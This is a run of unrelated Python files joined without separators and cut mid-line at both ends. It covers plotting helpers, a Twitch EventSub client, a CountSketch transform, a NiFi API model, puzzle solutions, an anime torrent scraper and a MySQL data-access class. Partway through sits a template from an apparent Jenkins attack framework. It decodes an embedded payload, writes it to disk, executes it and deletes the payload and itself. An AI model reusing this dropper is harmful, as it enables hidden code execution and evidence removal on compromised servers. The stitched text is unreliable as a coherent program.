colors.Normalize(vmin=limits[0], vmax=limits[1]) img.set_norm(norm) if xTicks is not None: ax.set_xticks(np.arange(len(xTicks))) ax.set_xticklabels(xTicks) plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") if yTicks is not None: ax.set_yticks(np.arange(len(yTicks))) ax.set_yticklabels(yTicks) return img def plot_matrix(data, shape, xlabels=None, ylabels=None, plottitles=None, lims=None, title=None, haveColorBar=False, xTicks=None, yTicks=None, haveTicks=False, savename=None): # Create plot matrix nRows, nCols = shape fig, ax = plt.subplots(nrows=nRows, ncols=nCols, figsize=(5*nRows, 5*nCols)) if nRows == 1: ax = ax[None, :] if nCols == 1: ax = ax[:, None] if title is not None: fig.suptitle(title) # Plot data for iRow in range(nRows): for iCol in range(nCols): iPlot = iCol + nCols*iRow limitsThis = lims[iPlot] if lims is not None else None titleThis = plottitles[iPlot] if plottitles is not None else None imshow(fig, ax[iRow][iCol], data[iPlot], title=titleThis, haveColorBar=haveColorBar, haveTicks=haveTicks, xTicks=xTicks, yTicks=yTicks, limits=limitsThis) if xlabels is not None: for iCol in range(nCols): ax[0][iCol].set_title(xlabels[iCol]) if ylabels is not None: for iRow in range(nRows): ax[iRow][0].set_ylabel(ylabels[iRow]) if savename is not None: plt.savefig(savename, dpi=300) return fig, ax """ Copyright 2021 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import requests import json from os import path file_path = path.abspath(__file__) dir_path = path.dirname(file_path) credentials_path = path.join(dir_path,'credentials.json') class registerEventsub: def __init__(self, name=None): self.name = name self.credentials = json.load(open(credentials_path)) self.accessToken = self.getToken() if name != None: self.userId = self.getIdFromName() def getToken(self): r = requests.post(f"https://id.twitch.tv/oauth2/token?client_id={self.credentials['twitch']['id']}&client_secret={self.credentials['twitch']['secret']}&grant_type=client_credentials") print(r.json()) return f"Bearer {r.json()['access_token']}" def getIdFromName(self): r = requests.get(f"https://api.twitch.tv/helix/users?login={self.name}", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) return r.json()['data'][0]['id'] def listSubscriptions(self): r = requests.get("https://api.twitch.tv/helix/eventsub/subscriptions", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) return r.json() def deleteSubscription(self, sub_id): r = requests.delete(f"https://api.twitch.tv/helix/eventsub/subscriptions?id={sub_id}", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) print(r) def createEventSub(self): headers = { "Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id'], "Content-Type": "application/json" } data = { "type": "channel.follow", "version": "1", "condition": { "broadcaster_user_id": self.userId }, "transport": { "method": "webhook", "callback": self.credentials['endpoint'], "secret": self.credentials['twitch']['eventsub_secret'] } } r = requests.post("https://api.twitch.tv/helix/eventsub/subscriptions", headers=headers, data=json.dumps(data)) print(r.json()) def registerUser(username): eventSubInstance = registerEventsub(username) eventSubInstance.createEventSub() def removeSubscriptions(): eventSubInstance = registerEventsub() for item in eventSubInstance.listSubscriptions()['data']: eventSubInstance.deleteSubscription(item['id']) def listSubscriptions(): eventSubInstance = registerEventsub() print(json.dumps(eventSubInstance.listSubscriptions()['data'], indent=4)) #!/usr/bin/python # Codeing By IOXhop : www.ioxhop.com # : www.fb.me/maxthai import time import IOXhop_MCUio as mcu def main(): mcu.begin(0x08) while True: value = mcu.Aget(mcu.A0) print value time.sleep(0.5) if __name__ == '__main__': main()1-10 from __future__ import division, print_function, absolute_import import numpy as np __all__ = ['clarkson_woodruff_transform'] def cwt_matrix(n_rows, n_columns): """ TODO: Document Function """ S = np.zeros((n_rows, n_columns)) nz_positions = np.random.randint(0, n_rows, n_columns) values = np.random.choice([1, -1], n_columns) for i in range(n_columns): S[nz_positions[i]][i] = values[i] return S def clarkson_woodruff_transform(input_matrix, sketch_size, direcction="rows"): """ Given a matrix A (input_matrix) of size (n, d), compute a matrix A' of size (n, s) which holds: $||Ax|| = (1 \pm \epsilon) ||A'x||$ with high probability. To obtain A' we create a matrix S of size (d, s) where every column of transpose(S) has only one position distinct to zero with value +1 or -1. We multiply S*A to obtain A'. Parameters ---------- input_matrix (A) : (n, d) array_like Input matrix n_columns (s) : int number of columns for A' Returns ------- A' : (n, s) array_like Sketch of A Notes ----- This is an implementation of the Clarckson-Woodruff Transform (also known as CountSketch) introduced for first time in and . Low rank approximation and regression in input sparsity time. In STOC, 2013. A' can be computed in O(nnz(A)) but we don't take advantage of sparse matrix in this implementation """ #TODO: Rewrite function documentation if (direcction == "rows"): S = cwt_matrix(sketch_size, input_matrix.shape[0]) return np.dot(S, input_matrix) elif (direcction == "columns"): S = cwt_matrix(input_matrix.shape[1], sketch_size) return np.dot(input_matrix, S) else: raise ValueError('Value of direrction must be "rows" or "columns"') # =============================================================================== # Copyright 2016 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== from __future__ import absolute_import from pyface.tasks.traits_task_pane import TraitsTaskPane from traits.api import Property from traitsui.api import View, UItem, HGroup, VGroup, EnumEditor, VSplit, spring, Item from traitsui.tabular_adapter import TabularAdapter from pychron.core.ui.tabular_editor import myTabularEditor from pychron.envisage.icon_button_editor import icon_button_editor class ProjectAdapter(TabularAdapter): columns = [('ProjectID', 'unique_id'), ('Name', 'name'), ('Lab Contact', 'lab_contact'), ('PI', 'principal_investigator'), ('Checkin', 'checkin_date'), ('Comment', 'comment')] checkin_date_text = Property def _get_checkin_date_text(self): ret = '' if self.item.checkin_date: ret = self.item.checkin_date return str(ret) class ProjectPane(TraitsTaskPane): def traits_view(self): fgrp = HGroup(UItem('filter_attr', editor=EnumEditor(name='filter_attrs')), UItem('filter_str'), show_border=True, label='Filter') tgrp = VGroup(UItem('items', height=600, editor=myTabularEditor(adapter=ProjectAdapter(), editable=False, selected='selected', multi_select=True, refresh='refresh', scroll_to_row='scroll_to_row'))) edit_grp = VGroup(Item('project_name', label='Project Name'), VGroup(UItem('comment', style='custom'), enabled_when='selected', label='Comment', show_border=True), HGroup(spring, icon_button_editor('save_button', 'database_save', tooltip='Save changes to ' 'database'))) bgrp = VSplit(tgrp, edit_grp) g = VGroup(fgrp, bgrp) v = View(g) return v # ============= EOF ============================================= from math import ceil inputs = [int(i) for i in input().split()] print(ceil(inputs[0] / inputs[2]) * ceil(inputs[1] / inputs[2])) real = float (input("Insira o valor em reais : ")) print ("R$ {:.2f} para US {:.2f} ".format(real,real/5.53)) # o valor do dolar no dia 12/10 as 12:04import random import praw import requests reddit = None unsplash_access_key = None def __init__(config): global reddit reddit = praw.Reddit( client_id=config["reddit_client_id"], client_secret=config["reddit_client_secret"], password=config["reddit_password"], user_agent="Photobot", username=config["reddit_username"], ) global unsplash_access_key unsplash_access_key = config["usplash_access_key"] class Photo: """A simple class for storring, URLs of photos and where they came from""" def __init__(self, url, name, source_url, creator="", creator_url=""): self.url = url self.name = name self.source_url = source_url self.creator = creator self.creator_url = creator_url def __repr__(self): return "" % ( self.url, self.name, self.source_url, ) def get_subreddits_photos(number=3): # All interesting subreddits subreddits = [ "analog", "architecture", "earthporn", "itookapicture", "natureporn", "photographs", "portraisphotos", "portraits", "portraitsporn", ] # Combine all subreddits to one string subreddits_combined = "+".join(subreddits) posts = reddit.subreddit(subreddits_combined).hot(limit=64) # Filter the posts photos = [] for post in posts: # Ignore if they are: # - text only # - under 10 upvotes # - not ok for under 18 # - sticked to a subreddit if post.is_self or post.score < 10 or post.over_18 or post.stickied: continue # Add the photo to the list photo = Photo( post.url, post.subreddit.display_name.capitalize(), "https://reddit.com" + post.permalink, post.author.name.replace("\\", "").lower(), "https://reddit.com/u/" + post.author.name + "/posts", ) photos.append(photo) # Shorten the list if it is longer than expected if len(photos) > number: random.shuffle(photos) photos = photos[:number] return photos def get_random_unsplash_photos(number=3): response = requests.get( "https://api.unsplash.com/photos", params={ "client_id": unsplash_access_key, "page": random.randint(1, 15), "per_page": number, }, ) data = response.json() # Convert the data to photos photos = [] for result in data: photo = Photo( url=result["urls"]["regular"], name=result["description"], source_url=result["links"]["html"], creator=result["user"]["name"], creator_url=result["user"]["links"]["html"], ) # Set to empty text if there is no description if photo.name is None: photo.name = "Photo" if len(photo.name) > 25: photo.name = photo.name[:22] + "..." photos.append(photo) return photos def get_inspiration_photos(number=6): print("Load inspiration images ...") # Calculate how many images of each kind reddit_number = int(number / 2) unsplash_number = number - reddit_number # Load the images photos = get_subreddits_photos(reddit_number) print(f"Got {len(photos)} reddit images") photos += get_random_unsplash_photos(unsplash_number) print(f"Got {len(photos)} unsplash images") # Shuffle the images and return them random.shuffle(photos) return photos def get_search_photos(query): response = requests.get( "https://api.unsplash.com/search/photos", params={ "query": query, "client_id": unsplash_access_key, "per_page": "5", }, ) data = response.json() photos = [] for result in data["results"]: photo = Photo( url=result["urls"]["regular"], name=result["description"], source_url=result["links"]["html"], creator=result["user"]["name"], creator_url=result["user"]["links"]["html"], ) # Set to empty text if there is no description if photo.name is None: photo.name = "Photo" if len(photo.name) > 25: photo.name = photo.name[:22] + "..." photos.append(photo) return photos examples/mplot1.py #! /usr/bin/env python # # quick and dirty processing of the MD All Sky images from astropy.io import fits from scipy.misc import imsave import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np import aplpy import argparse as ap import os.path import logging import time def d(ff, box=[]): #very specific for 16 bit data, since we want to keep the data in uint16 h = fits.open(ff, do_not_scale_image_data=True) if len(box)==0: return h[0].header, h[0].data else: # figure out 0 vs. 1 based offsets; box is 1 based return h[0].header, h[0].data[box[1]:box[3], box[0]:box[2]] def dsum(i0,i1,step = 1, box=[]): """ for a range of fits files compute the mean and dispersion from the mean """ for i in range(i0,i1+1,step): ff = 'IMG%05d.FIT' % i h1, d1 = d(ff,box) #very specific for 16 bit data, since we want to keep the data in uint16 bzero = h1['BZERO'] bscale = h1['BSCALE'] if i == i0: sum0 = 1.0 sum1 = d1*bscale+bzero sum2 = sum1*sum1 #sum1 = d1 #sum2 = d1*d1 h = h1 nx = d1.shape[1] ny = d1.shape[0] nz = i1 + 1 - i0 c = np.zeros((nz, ny, nx)) c[0,:,:] = d1.reshape(ny,nx) else: sum0 = sum0 + 1.0 sum1 = sum1 + (d1 * bscale + bzero) sum2 = sum2 + (d1 * bscale + bzero) * (d1 * bscale + bzero) #sum2 = sum2+d1*d1 c[i - i0,:,:] = d1.reshape(ny,nx) sum1 = sum1 / sum0 sum2 = sum2 / sum0 - sum1*sum1 print (type(sum1), type(sum2)) return (h,sum1,np.sqrt(sum2),c) def show(sum): """ some native matplotlib display, doesn't show pointsources well at all """ ip = plt.imshow(sum) plt.show() def show2(sum): """ aplpy is the better viewer clearly """ fig = aplpy.FITSFigure(sum) #fig.show_grayscale() fig.show_colorscale() def show3(sum1,sum2): """ aplpy is the better viewer clearly """ fig = aplpy.FITSFigure(sum1,subplot=(2,2,1)) #fig = aplpy.FITSFigure(sum2,subplot=(2,2,2),figure=1) #fig.show_grayscale() fig.show_colorscale() # For some variations on this theme, e.g. time.time vs. time.clock, see # http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python # class Dtime(object): """ Class to help measuring the wall clock time between tagged events Typical usage: dt = Dtime() ... dt.tag('a') ... dt.tag('b') """ def __init__(self, label=".", report=True): self.start = self.time() self.init = self.start self.label = label self.report = report self.dtimes = [] dt = self.init - self.init if self.report: logging.info("Dtime: %s ADMIT " % self.label + str(self.start)) logging.info("Dtime: %s BEGIN " % self.label + str(dt)) def reset(self, report=True): self.start = self.time() self.report = report self.dtimes = [] def tag(self, mytag): t0 = self.start t1 = self.time() dt = t1 - t0 self.dtimes.append((mytag, dt)) self.start = t1 if self.report: logging.info("Dtime: %s " % self.label + mytag + " " + str(dt)) return dt def show(self): if self.report: for r in self.dtimes: logging.info("Dtime: %s " % self.label + str(r[0]) + " " + str(r[1])) return self.dtimes def end(self): t0 = self.init t1 = self.time() dt = t1 - t0 if self.report: logging.info("Dtime: %s END " % self.label + str(dt)) return dt def time(self): """ pick the actual OS routine that returns some kind of timer time.time : wall clock time (include I/O and multitasking overhead) time.clock : cpu clock time """ return np.array([time.clock(), time.time()]) if __name__ == '__main__': logging.basicConfig(level = logging.INFO) dt = Dtime("mplot1") #--start, -s n #--end, -e n #--box x1 y1 x2 y2 parser = ap.ArgumentParser(description='Plotting .fits files.') parser.add_argument('-f', '--frame', nargs = '*', type = int, help = 'Starting and ending parameters for the frames analyzed') parser.add_argument('-b', '--box', nargs = 4, type = int, help = 'Coordinates for the bottom left corner and' + 'top right corner of a rectangle of pixels to be analyzed from the' + ' data. In the structure x1, y1, x2, y2 (1 based numbers)') parser.add_argument('-g', '--graphics', nargs = 1, type = int, default = 0, help = 'Controls whether to display or save graphics. 0: no graphics,' + '1: display graphics, 2: save graphics as .png') args = vars(parser.parse_args()) if args['frame'] == None: count = 0 start = None end = None step = 1 #while we have yet to find an end while end == None: filename = 'IMG%05d.FIT' % count #if start has not been found yet, and this file exists if start == None and os.path.isfile(filename): start = count #if start has been found and we finally found a file that doesn't #exist, set end to the last file that existed (count - 1.FIT) elif start != None and not os.path.isfile(filename): end = count - 1 count += 1 elif len(args['frame']) >= 2 and len(args['frame']) <= 3: start = args['frame'][0] # starting frame (IMGnnnnn.FIT) end = args['frame'][1] # ending frame if len(args['frame']) == 3: step = args['frame'] else: step = 1 else: raise Exception("-f needs 0, 2, or 3 arguments.") box = args['box'] # BLC and TRC if box == None: box = [] dt.tag("start") # compute the average and dispersion of the series h1,sum1,sum2,cube = dsum(start,end,step,box=box) # end can be uninitialized here might throw an error? dt.tag("dsum") nz = cube.shape[0] # delta X and Y images dsumy = sum1 - np.roll(sum1, 1, axis = 0) # change in the y axis dsumx = sum1 - np.roll(sum1, 1, axis = 1) # change in the x axis # write them to FITS fits.writeto('dsumx.fits', dsumx, h1, clobber=True) fits.writeto('dsumy.fits', dsumy, h1, clobber=True) fits.writeto('sum1.fits', sum1, h1, clobber=True) fits.writeto('sum2.fits', sum2, h1, clobber=True) dt.tag("write2d") # 3D cube to h1['NAXIS'] = 3 h1['NAXIS3'] = nz fits.writeto('cube.fits', cube, h1, clobber=True) dt.tag("write3d") if args['graphics'][0] == 1: # plot the sum1 and sum2 correllation (glueviz should do this) s1 = sum1.flatten() s2 = sum2.flatten() fig = plt.figure() ax = fig.add_subplot(111) ax.scatter(s1,s2) plt.show() show2(sum1) show2(sum2) if args['graphics'][0] == 2: imsave('sum1.png', sum1) imsave('sum2.png', sum2) dt.tag("done") dt.end() challenges/bringing-a-gun-to-a-trainer-fight/solution_01.py0 from math import atan2 def solution(dimensions, your_position, trainer_position, distance): w, h = dimensions x, y = your_position a, b = trainer_position m_x = ((x + distance) // w) + 1 m_y = ((y + distance) // h) + 1 dd = distance**2 aa = {} def reflect(x1, y1, n, m): return (n * w) + (w - x1) if n % 2 == 1 else (n * w) + x1, (m * h) + (h - y1) if m % 2 == 1 else (m * h) + y1 def l2(x1, y1): return (x1 - x)**2 + (y1 - y)**2 def angle(x1, y1): return atan2((y1 - y), (x1 - x)) pp1 = [] for i in range(m_x + 1): for j in range(m_y + 1): p = reflect(x, y, i, j) if l2(*p) <= dd: pp1.append((p[0], p[1], 0)) p = reflect(a, b, i, j) if l2(*p) <= dd: pp1.append((p[0], p[1], 1)) pp2 = [(-p[0], p[1], p[2]) for p in pp1 if l2(-p[0], p[1]) <= dd] pp3 = [(-p[0], -p[1], p[2]) for p in pp1 if l2(-p[0], -p[1]) <= dd] pp4 = [( p[0], -p[1], p[2]) for p in pp1 if l2( p[0], -p[1]) <= dd] for p in pp1: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp2: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp3: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp4: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) return len([k for k in aa if aa[k][2] == 1]) from typing import List class Solution: def buildArray(self, target: List[int], n: int) -> List[str]: ls, j, l = [], 0, len(target) for i in range(1, n + 1): ls.append("Push") if target[j] == i: j += 1 if j == l: return ls else: ls.append("Pop") return ls Classes/environment.py #!/usr/env/bin python3 import pygame from Game.Classes.image import image class environment(object): def __init__(self, name, ecran, posX = 0, posY = 0): self.ecran = ecran self.posX = posX self.posY = posY self.name = name self.image = None def getImage(self): if self.image == None: self.image = pygame.image.load(image.getImagePath()+"Environment/" + self.name + ".png").convert_alpha() return self.image @property def startPosX(self): return self.posX @property def endPosX(self): return self.posX + self.image.get_width() def refresh(self): self.ecran.blit(self.getImage(), (self.posX, self.posY))# This file is Copyright (c) 2018 <> # This file is Copyright (c) 2018-2019 <> # License: BSD import os from migen import * from litex.soc.interconnect import wishbone CPU_VARIANTS = ["standard"] class Minerva(Module): @property def name(self): return "minerva" @property def endianness(self): return "little" @property def gcc_triple(self): return ("riscv64-unknown-elf", "riscv32-unknown-elf", "riscv-none-embed") @property def gcc_flags(self): flags = "-march=rv32i " flags += "-mabi=ilp32 " flags += "-D__minerva__ " return flags @property def linker_output_format(self): return "elf32-littleriscv" @property def reserved_interrupts(self): return {} def __init__(self, platform, cpu_reset_address, variant="standard"): assert variant is "standard", "Unsupported variant %s" % variant self.platform = platform self.variant = variant self.reset = Signal() self.ibus = wishbone.Interface() self.dbus = wishbone.Interface() self.interrupt = Signal(32) # # # self.specials += Instance("minerva_cpu", # clock / reset i_clk=ClockSignal(), i_rst=ResetSignal(), # interrupts i_external_interrupt=self.interrupt, # ibus o_ibus__stb=self.ibus.stb, o_ibus__cyc=self.ibus.cyc, o_ibus__cti=self.ibus.cti, o_ibus__bte=self.ibus.bte, o_ibus__we=self.ibus.we, o_ibus__adr=self.ibus.adr, o_ibus__dat_w=self.ibus.dat_w, o_ibus__sel=self.ibus.sel, i_ibus__ack=self.ibus.ack, i_ibus__err=self.ibus.err, i_ibus__dat_r=self.ibus.dat_r, # dbus o_dbus__stb=self.dbus.stb, o_dbus__cyc=self.dbus.cyc, o_dbus__cti=self.dbus.cti, o_dbus__bte=self.dbus.bte, o_dbus__we=self.dbus.we, o_dbus__adr=self.dbus.adr, o_dbus__dat_w=self.dbus.dat_w, o_dbus__sel=self.dbus.sel, i_dbus__ack=self.dbus.ack, i_dbus__err=self.dbus.err, i_dbus__dat_r=self.dbus.dat_r, ) # add verilog sources self.add_sources(platform) @staticmethod def add_sources(platform): vdir = os.path.join( os.path.abspath(os.path.dirname(__file__)), "verilog") platform.add_source(os.path.join(vdir, "minerva.v")) # coding: utf-8 """ NiFi Rest Api The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service. OpenAPI spec version: 1.11.1-SNAPSHOT Contact: Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class ReportingTaskStatusDTO(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'run_status': 'str', 'validation_status': 'str', 'active_thread_count': 'int' } attribute_map = { 'run_status': 'runStatus', 'validation_status': 'validationStatus', 'active_thread_count': 'activeThreadCount' } def __init__(self, run_status=None, validation_status=None, active_thread_count=None): """ ReportingTaskStatusDTO - a model defined in Swagger """ self._run_status = None self._validation_status = None self._active_thread_count = None if run_status is not None: self.run_status = run_status if validation_status is not None: self.validation_status = validation_status if active_thread_count is not None: self.active_thread_count = active_thread_count @property def run_status(self): """ Gets the run_status of this ReportingTaskStatusDTO. The run status of this ReportingTask :return: The run_status of this ReportingTaskStatusDTO. :rtype: str """ return self._run_status @run_status.setter def run_status(self, run_status): """ Sets the run_status of this ReportingTaskStatusDTO. The run status of this ReportingTask :param run_status: The run_status of this ReportingTaskStatusDTO. :type: str """ allowed_values = ["RUNNING", "STOPPED", "DISABLED"] if run_status not in allowed_values: raise ValueError( "Invalid value for `run_status` ({0}), must be one of {1}" .format(run_status, allowed_values) ) self._run_status = run_status @property def validation_status(self): """ Gets the validation_status of this ReportingTaskStatusDTO. Indicates whether the component is valid, invalid, or still in the process of validating (i.e., it is unknown whether or not the component is valid) :return: The validation_status of this ReportingTaskStatusDTO. :rtype: str """ return self._validation_status @validation_status.setter def validation_status(self, validation_status): """ Sets the validation_status of this ReportingTaskStatusDTO. Indicates whether the component is valid, invalid, or still in the process of validating (i.e., it is unknown whether or not the component is valid) :param validation_status: The validation_status of this ReportingTaskStatusDTO. :type: str """ allowed_values = ["VALID", "INVALID", "VALIDATING"] if validation_status not in allowed_values: raise ValueError( "Invalid value for `validation_status` ({0}), must be one of {1}" .format(validation_status, allowed_values) ) self._validation_status = validation_status @property def active_thread_count(self): """ Gets the active_thread_count of this ReportingTaskStatusDTO. The number of active threads for the component. :return: The active_thread_count of this ReportingTaskStatusDTO. :rtype: int """ return self._active_thread_count @active_thread_count.setter def active_thread_count(self, active_thread_count): """ Sets the active_thread_count of this ReportingTaskStatusDTO. The number of active threads for the component. :param active_thread_count: The active_thread_count of this ReportingTaskStatusDTO. :type: int """ self._active_thread_count = active_thread_count def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, ReportingTaskStatusDTO): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other sc979/jenkins-attack-framework #!/usr/bin/python import base64 import inspect import os import signal import time import zlib def handler(*ignored): current_file = os.path.abspath(inspect.stack()[0][1]) script_file = os.path.join(os.path.dirname(current_file), "@{file_name}") with open(script_file, "wb") as f: f.write(zlib.decompress(base64.b64decode("@{payload}"))) os.chmod(script_file, 509) os.system("@!{executor}" + script_file + "@!{additional_args}") os.remove(script_file) os.remove(current_file) signal.signal(signal.SIGTERM, handler) while True: time.sleep(100000) 1-10 #!/usr/bin/env python # encoding: utf-8 """ Advent of Code 2021 - Day 08 https://adventofcode.com/2021/day/08 Solution 1: 521 Solution 2: 1016804 """ __author__ = "" __email__ = "" from difflib import SequenceMatcher SEVEN_SEGMENT = {0: 'abcefg', 1: 'cf', 2: 'acdeg', 3: 'acdfg', 4: 'bcdf', 5: 'abdfg', 6: 'abdefg', 7: 'acf', 8: 'abcdefg', 9: 'abcdfg'} def similar(a, b): return SequenceMatcher(None, a, b).ratio() def signatures(strings): """Returns a list of hashable signatures based on the distance between each string and all the other strings in the input vector """ return [tuple(sorted(similar(a, b) for b in strings)) for a in strings] def main(ifile='inputs/day_08_input.txt'): symbols = list(SEVEN_SEGMENT.values()) lengths = [len(v) for v in symbols] unique_lengths = [v for v in lengths if lengths.count(v) == 1] sign_to_num = {x: v for x, v in zip(signatures(symbols), SEVEN_SEGMENT)} counter = 0 total = 0 with open(ifile) as file: for line in file: pattern, output = ([''.join(sorted(x)) for x in field.split()] for field in line.strip().split(' | ')) # Part 1 counter += len([digit for digit in output if len(digit) in unique_lengths]) # Part 2 str_to_sign = {x: v for x, v in zip(pattern, signatures(pattern))} output_value = [sign_to_num[str_to_sign[x]] for x in output] total += int(''.join(str(x) for x in output_value)) print(f"There are {counter} digits with a unique number of segments") print(f"The sum of all 4-digit outputs is {total}") return [counter, total] if __name__ == "__main__": main() import os, re import requests, threading import bs4 from clint.textui import prompt, puts, validators, columns BASE_URL = 'http://www.shanaproject.com' OUTPATH = os.path.join(os.getenv('HOME'), 'PyAnime/') size_dict = { 'KB': 0, 'MB': 1, 'GiB': 2, 'GB': 2 } MAX_THREADS = 5 class RangeValidator: message = 'Please enter valid range' def __init__(self, msg=None): self.message = msg or RangeValidator.message def __call__(self, value): if value == '*' or re.fullmatch(r'\d+', value): return value else: reg = re.fullmatch(r'^(\d+)-(\d+)$', value) if reg: return int(reg[1]), int(reg[2]) else: raise validators.ValidationError(self.message) def main(): command = prompt.options('Select a command', options=commands) while command != 'q': command() puts() command = prompt.options('Select a command', options=commands) pass def change_download_location(): to_path = prompt.query('Enter output path (~/PyAnime by default)', validators=[validators.PathValidator()]) print('Path change to \'{:s}\''.format(to_path)) def clear(): os.system('cls' if os.name == 'nt' else 'clear') def request_data(url, params=None): try: req = requests.get(url, params=params) req.raise_for_status() except requests.HTTPError as error: SystemExit('Error occured\n'+error) return req def download_ep(download_path): data = request_data(BASE_URL+download_path) # Implement download code def parse_range(list): for range, size, links in list: if range.isdigit(): yield int(range) elif range.startswith('Vol'): yield int(range.split(' ')[1]) else: reg = re.fullmatch(r'(\d+).+?(\d+)', range) if reg: yield reg.group(1) + ' ' + reg.group(2) else: puts('Detected invalid range') yield None def compare_file_sizes(new, master): reg_new = re.fullmatch(r'([\d\.]+)(\w+)', new) reg_master = re.fullmatch(r'([\d\.]+)(\w+)', master) if reg_new and reg_master: if size_dict[reg_new.group(2)] < size_dict[reg_master.group(2)]\ or float(reg_new.group(1)) < float(reg_master.group(1)): return True return False else: raise SystemExit('Invalid file sizes:', new, master) def filter_queue(queue, low=True): values_dict = dict() print(queue) for i, item in enumerate(queue): if item[0] == '\xa0': continue if item[0] not in values_dict\ or compare_file_sizes(item[1], values_dict[item[0]][1]): values_dict[item[0]] = (i, item[1],) return [queue[int(index)] for index in [i[0] for i in values_dict.values()]] def bulk_download(): search_term = prompt.query('Enter series title') # subber = prompt.query('Enter subber name (Optional)', validators=[]) data = request_data(BASE_URL+'/search/', params={ 'title': search_term # 'subber': subber }) soup = bs4.BeautifulSoup(data.content, 'lxml') if soup.select('center'): puts('No releases found') else: title_entries = soup.select('.release_block .release_title .release_text_contents a') filtered_entries = [] for entry in title_entries: title = entry.getText() if not entry.get('rel') and title not in [entry[0] for entry in filtered_entries]: filtered_entries.append((title, entry.get('href'))) selected = prompt.options('Select anime series', options=[entry[0] for entry in filtered_entries]) wanted_range = prompt.query('Enter episode range (* for all)', validators=[RangeValidator()]) data = request_data(BASE_URL+filtered_entries[int(selected)-1][1]) soup = bs4.BeautifulSoup(data.content, 'lxml') episode_ranges = [tag.getText() for tag in soup.select('.release_block .release_episode')[1:]] file_sizes = [tag.getText() for tag in soup.select('.release_block .release_size')[1:]] download_links = [tag.get('href') for tag in soup.find_all('a', attrs={'type':'application/x-bittorrent'})] assert len(file_sizes) == len(download_links) == len(episode_ranges) episodes = list(zip(episode_ranges, file_sizes, download_links)) download_queue = [] if isinstance(wanted_range, tuple): for i, range in enumerate(parse_range(episodes)): if (isinstance(range, str) and range.split(' ')[0] >= wanted_range[0]\ and range.split(' ')[1] <= wanted_range[1]) or\ (wanted_range[0] <= range <= wanted_range[1]): download_queue.append(episodes[i]) elif wanted_range == '*': download_queue = episodes[:] elif wanted_range.isdigit(): for i, range in enumerate(parse_range(episodes)): if isinstance(range, int) and range == int(wanted_range): download_queue.append(episodes[i]) else: continue else: raise SystemExit('Invalid range') download_queue = filter_queue(download_queue) if download_queue: puts(columns(['Episode', 10], ['Size', 10])) for episode in download_queue: puts(columns([episode[0], 10], [episode[1], 10])) else: puts('No entries to download') return input('Proceed with download? (Ctrl-C to exit)') current_downloads = [] for item in download_queue: t = threading.Thread(target=request_data, args=BASE_URL+'item') if current_downloads >= MAX_THREADS: current_downloads[0].join() t.start() for thread in current_downloads: thread.join() puts('Download completed') commands = [ {'selector': '1', 'prompt': 'Bulk download an anime series', 'return': bulk_download}, {'selector': '2', 'prompt': 'Change download location', 'return': change_download_location}, {'selector': '3', 'prompt': 'Quit', 'return': 'q'} ] if __name__ == '__main__': if not os.path.isdir(OUTPATH): os.mkdir(OUTPATH) try: main() except KeyboardInterrupt: puts('\nGoodbye!') import pymysql import Package as pkg import Address as adr class Packagedao(object): def __init__(self, username, password, host, db): self.username = username self.password = password self.host = host self.db = db #QUERYS all packages def query_packages(self): pkglst = [] conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() cur.execute( \ """ SELECT * FROM package """ ) for row in cur: print(row) p = pkg.Package(id=row[0], size_id=row[1], src_id=row[2], dst_id=row[3]) pkglst.append(p) cur.close() conn.close() return pkglst #querys individual packages def query_package(self, pkgid): conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() cur.execute("SELECT * FROM package WHERE pkgid =%s", (pkgid)) row = cur.fetchone() if row: p = pkg.Package(id=row[0], size_id=row[1], src_id=row[2], 